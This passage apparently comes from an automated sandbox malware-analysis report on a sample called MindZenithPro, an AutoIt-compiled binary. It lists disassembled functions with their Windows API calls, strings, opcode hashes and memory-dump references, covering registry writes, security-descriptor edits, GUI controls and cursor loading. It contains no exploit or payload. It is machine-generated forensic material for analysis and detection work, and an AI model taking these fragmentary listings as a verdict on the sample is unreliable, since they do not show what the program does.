                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 004519EC
                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 004519FF
                                    • IsWindowVisible.USER32(00000000), ref: 00451A5B
                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00451A76
                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00451A8A
                                    • GetWindowRect.USER32(00000000,?), ref: 00451AA2
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00451AC8
                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00451AE2
                                    • CopyRect.USER32(?,?), ref: 00451AF9
                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00451B64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: 2967beb1d28201a7a97553284903de202f8c9f8761baa8b46b99742e0b5cb943
                                    • Instruction ID: 3049f9c814a4e04503d5d954c21ea051c983ba6c8e9ffdb6f51d2b6ab0a3e58b
                                    • Opcode Fuzzy Hash: 2967beb1d28201a7a97553284903de202f8c9f8761baa8b46b99742e0b5cb943
                                    • Instruction Fuzzy Hash: E7B19971A04340AFDB14DF64C885B5BBBE4EF84311F00891DF9999B2A2D735EC49CB96
                                    Function 003C1456 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 282windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003C152D
                                    • GetSystemMetrics.USER32(00000007), ref: 003C1535
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003C1560
                                    • GetSystemMetrics.USER32(00000008), ref: 003C1568
                                    • GetSystemMetrics.USER32(00000004), ref: 003C158D
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003C15AA
                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003C15BA
                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003C15ED
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003C1601
                                    • GetClientRect.USER32(00000000,000000FF), ref: 003C161F
                                    • GetStockObject.GDI32(00000011), ref: 003C163B
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1646
                                      • Part of subcall function 003C135A: GetCursorPos.USER32(?), ref: 003C136E
                                      • Part of subcall function 003C135A: ScreenToClient.USER32(00000000,?), ref: 003C138B
                                      • Part of subcall function 003C135A: GetAsyncKeyState.USER32(00000001), ref: 003C13C2
                                      • Part of subcall function 003C135A: GetAsyncKeyState.USER32(00000002), ref: 003C13DC
                                    • SetTimer.USER32(00000000,00000000,00000028,003D9421), ref: 003C166D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: ,)I$,)I$AutoIt v3 GUI
                                    • API String ID: 1458621304-3728630083
                                    • Opcode ID: 3a9cffc25ddb7cce95d57c68680097bb9a471ddf0da85d05d2d6281edfb80d01
                                    • Instruction ID: 0d2a5eddbad5d405b13ade6de981fe1c86a1c0c700e00c75b92176923a04d76a
                                    • Opcode Fuzzy Hash: 3a9cffc25ddb7cce95d57c68680097bb9a471ddf0da85d05d2d6281edfb80d01
                                    • Instruction Fuzzy Hash: DDB17B71A00209AFCB15DFA8CD49BAE7BB4EB48315F10422AFA05EB2D1DB74D841CB59
                                    Function 004509FB Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00450A9F
                                    • _wcslen.LIBCMT ref: 00450AD9
                                    • _wcslen.LIBCMT ref: 00450B43
                                    • _wcslen.LIBCMT ref: 00450BAB
                                    • _wcslen.LIBCMT ref: 00450C2F
                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00450C7F
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00450CBE
                                      • Part of subcall function 003DFD18: _wcslen.LIBCMT ref: 003DFD23
                                      • Part of subcall function 00422921: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042293A
                                      • Part of subcall function 00422921: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0042296C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                    • API String ID: 1103490817-719923060
                                    • Opcode ID: b83483e6bd13976e8557409c606d63bfa18d7c09aed90ac21cf98f127d4834ad
                                    • Instruction ID: 43318bf63feafc1e70a5b437bf3aeeb5c4dbd10fe7c28f8557c800b7408eab80
                                    • Opcode Fuzzy Hash: b83483e6bd13976e8557409c606d63bfa18d7c09aed90ac21cf98f127d4834ad
                                    • Instruction Fuzzy Hash: A0E1D3352043018FC715EF24C59192BB3E6BF84315F64895EF8969B392DB38ED09CB85
                                    Function 0042146D Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004217DB: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004217F6
                                      • Part of subcall function 004217DB: GetLastError.KERNEL32(?,00000000,00000000,?,?,0042127D,?,?,?), ref: 00421802
                                      • Part of subcall function 004217DB: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,0042127D,?,?,?), ref: 00421811
                                      • Part of subcall function 004217DB: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,0042127D,?,?,?), ref: 00421818
                                      • Part of subcall function 004217DB: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0042182F
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004214D7
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0042150B
                                    • GetLengthSid.ADVAPI32(?), ref: 00421522
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0042155C
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00421578
                                    • GetLengthSid.ADVAPI32(?), ref: 0042158F
                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00421597
                                    • HeapAlloc.KERNEL32(00000000), ref: 0042159E
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004215BF
                                    • CopySid.ADVAPI32(00000000), ref: 004215C6
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004215F5
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00421617
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00421629
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00421650
                                    • HeapFree.KERNEL32(00000000), ref: 00421657
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00421660
                                    • HeapFree.KERNEL32(00000000), ref: 00421667
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00421670
                                    • HeapFree.KERNEL32(00000000), ref: 00421677
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00421683
                                    • HeapFree.KERNEL32(00000000), ref: 0042168A
                                      • Part of subcall function 00421875: GetProcessHeap.KERNEL32(00000008,00421293,?,00000000,?,00421293,?), ref: 00421883
                                      • Part of subcall function 00421875: HeapAlloc.KERNEL32(00000000,?,00000000,?,00421293,?), ref: 0042188A
                                      • Part of subcall function 00421875: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00421293,?), ref: 00421899
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                    • String ID:
                                    • API String ID: 4175595110-0
                                    • Opcode ID: c89bdecc2f32599e8b9f1576e31273423936ff292fcd44e9d2fd78acd896d905
                                    • Instruction ID: 6f733a48bbac039e2d276acb93e1d217f05ff1911a18ee73fc1d93e9b2a8cd73
                                    • Opcode Fuzzy Hash: c89bdecc2f32599e8b9f1576e31273423936ff292fcd44e9d2fd78acd896d905
                                    • Instruction Fuzzy Hash: 70719BB1A00219BBDF209FA0EC44BEFBBB9AF14711F444166F905E72A1D734D946CB68
                                    Function 0044CB3E Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0044CC44
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0045DC1C,00000000,?,00000000,?,?), ref: 0044CCCB
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0044CD2B
                                    • _wcslen.LIBCMT ref: 0044CD7B
                                    • _wcslen.LIBCMT ref: 0044CDF6
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0044CE39
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0044CF48
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0044CFD4
                                    • RegCloseKey.ADVAPI32(?), ref: 0044D008
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0044D015
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0044D0E7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 9721498-966354055
                                    • Opcode ID: fcba4a796f844d3b4978ae0561bcaef469813afb64b1f655873ac6f53e09845b
                                    • Instruction ID: ac9c5f15b4967cb1614b14882c05b7f91c89ceb06c2cf0831b5101062cafd42b
                                    • Opcode Fuzzy Hash: fcba4a796f844d3b4978ae0561bcaef469813afb64b1f655873ac6f53e09845b
                                    • Instruction Fuzzy Hash: ED1258756046019FDB15DF24C881F2AB7E6EF88714F18849DF84A9B3A2CB35ED42CB85
                                    Function 004510D8 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00451180
                                    • _wcslen.LIBCMT ref: 004511BB
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0045120E
                                    • _wcslen.LIBCMT ref: 00451244
                                    • _wcslen.LIBCMT ref: 004512C0
                                    • _wcslen.LIBCMT ref: 0045133B
                                      • Part of subcall function 003DFD18: _wcslen.LIBCMT ref: 003DFD23
                                      • Part of subcall function 004232CA: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004232DC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 1103490817-4258414348
                                    • Opcode ID: 771c72429edc88fb5c370091475c4a04645582b602a191811275d0c0174983dd
                                    • Instruction ID: 1e3696aa62bcabaf9489aa36d17d26c15fc59ac0e896b7fc24618c7fc800d9ce
                                    • Opcode Fuzzy Hash: 771c72429edc88fb5c370091475c4a04645582b602a191811275d0c0174983dd
                                    • Instruction Fuzzy Hash: D9E1A3322087119FC714EF25C450A2AB7E2BF94315F50899EFC969B362D738ED4ACB85
                                    Function 0044D11F Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 240COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 1256254125-909552448
                                    • Opcode ID: 6ec67f669e57eb4aebeaf41abcbfd35646443840ae0efca27a3c5f927aea73be
                                    • Instruction ID: ecab4aecba8c42f54a887b3dbeee5fc3ff19233f8cc392d280f4bb2c509ea94b
                                    • Opcode Fuzzy Hash: 6ec67f669e57eb4aebeaf41abcbfd35646443840ae0efca27a3c5f927aea73be
                                    • Instruction Fuzzy Hash: 1971E232E005268BEB10EF68CD419BF33A1AF64350B61496BFC529B384EB78DD458799
                                    Function 00458A28 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 00458A46
                                    • _wcslen.LIBCMT ref: 00458A5A
                                    • _wcslen.LIBCMT ref: 00458A7D
                                    • _wcslen.LIBCMT ref: 00458AA0
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00458ADE
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004563B2), ref: 00458B3A
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00458B73
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00458BB6
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00458BED
                                    • FreeLibrary.KERNEL32(?), ref: 00458BF9
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00458C09
                                    • DestroyIcon.USER32(?,?,?,?,?,004563B2), ref: 00458C18
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00458C35
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00458C41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 799131459-1154884017
                                    • Opcode ID: e77cd826954b796685e76dd55403ba4b81f1571f09a64409dd5ad4add0ebb259
                                    • Instruction ID: f73c4d6f56b5be4cbf691f8cde1a6dcc02a35d65117c5263c6a835cf974be065
                                    • Opcode Fuzzy Hash: e77cd826954b796685e76dd55403ba4b81f1571f09a64409dd5ad4add0ebb259
                                    • Instruction Fuzzy Hash: 6761E171900619BAEB15DF64CC41BBF77ACAF08712F10461AFC14EA1D2DF78A984CBA4
                                    Function 003C35D5 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 0-1645009161
                                    • Opcode ID: 11856e6163ceab47e7cb4d8eec12c6c7f3cf80fbfb39c35f2544eeb6fa135e8e
                                    • Instruction ID: 957139cdb518e3aeed55fd6694548c5f7629425352aedbff7d65fe84aa6c8055
                                    • Opcode Fuzzy Hash: 11856e6163ceab47e7cb4d8eec12c6c7f3cf80fbfb39c35f2544eeb6fa135e8e
                                    • Instruction Fuzzy Hash: 3E81E571A40215BBCB12AF61DC82FAF3BA8AF00341F15802AF905AE2D1E774DF55C759
                                    Function 004345E8 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?), ref: 00434667
                                    • _wcslen.LIBCMT ref: 00434672
                                    • _wcslen.LIBCMT ref: 004346C9
                                    • _wcslen.LIBCMT ref: 00434707
                                    • GetDriveTypeW.KERNEL32(?), ref: 00434745
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0043478D
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004347C8
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004347F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 1839972693-4113822522
                                    • Opcode ID: 7193bdfd7cc48672ffa9c630cd00ba8ebad20f19aeb96898ebc64c7d05f1283b
                                    • Instruction ID: a56d2b850ad8466157f6e0b4c9bdbcf8399784b2708524b0606900751f8343ff
                                    • Opcode Fuzzy Hash: 7193bdfd7cc48672ffa9c630cd00ba8ebad20f19aeb96898ebc64c7d05f1283b
                                    • Instruction Fuzzy Hash: 4571DE325082019FC310EF24C8919AFB7E4EF98358F20492EF89587361E738ED46CB96
                                    Function 00426114 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 00426127
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00426139
                                    • SetWindowTextW.USER32(?,?), ref: 00426150
                                    • GetDlgItem.USER32(?,000003EA), ref: 00426165
                                    • SetWindowTextW.USER32(00000000,?), ref: 0042616B
                                    • GetDlgItem.USER32(?,000003E9), ref: 0042617B
                                    • SetWindowTextW.USER32(00000000,?), ref: 00426181
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004261A2
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004261BC
                                    • GetWindowRect.USER32(?,?), ref: 004261C5
                                    • _wcslen.LIBCMT ref: 0042622C
                                    • SetWindowTextW.USER32(?,?), ref: 00426268
                                    • GetDesktopWindow.USER32 ref: 0042626E
                                    • GetWindowRect.USER32(00000000), ref: 00426275
                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 004262CC
                                    • GetClientRect.USER32(?,?), ref: 004262D9
                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 004262FE
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00426328
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                    • String ID:
                                    • API String ID: 895679908-0
                                    • Opcode ID: 3ff0706aced180830d6557fc4177c88419446640094dc3085263efdab25a6600
                                    • Instruction ID: 9291089a33cc831c10cb415d3baebf519796f3ad06700c0535c73df3330f6d2b
                                    • Opcode Fuzzy Hash: 3ff0706aced180830d6557fc4177c88419446640094dc3085263efdab25a6600
                                    • Instruction Fuzzy Hash: 1371CF31A00715EFDB20DFA8DE45AAFBBF5FF48705F110929E546A22A0C778E940CB64
                                    Function 00440595 Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadCursorW.USER32(00000000,00007F89), ref: 004405AE
                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 004405B9
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004405C4
                                    • LoadCursorW.USER32(00000000,00007F03), ref: 004405CF
                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 004405DA
                                    • LoadCursorW.USER32(00000000,00007F01), ref: 004405E5
                                    • LoadCursorW.USER32(00000000,00007F81), ref: 004405F0
                                    • LoadCursorW.USER32(00000000,00007F88), ref: 004405FB
                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00440606
                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00440611
                                    • LoadCursorW.USER32(00000000,00007F83), ref: 0044061C
                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00440627
                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00440632
                                    • LoadCursorW.USER32(00000000,00007F84), ref: 0044063D
                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00440648
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00440653
                                    • GetCursorInfo.USER32(?), ref: 00440663
                                    • GetLastError.KERNEL32 ref: 004406A5
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
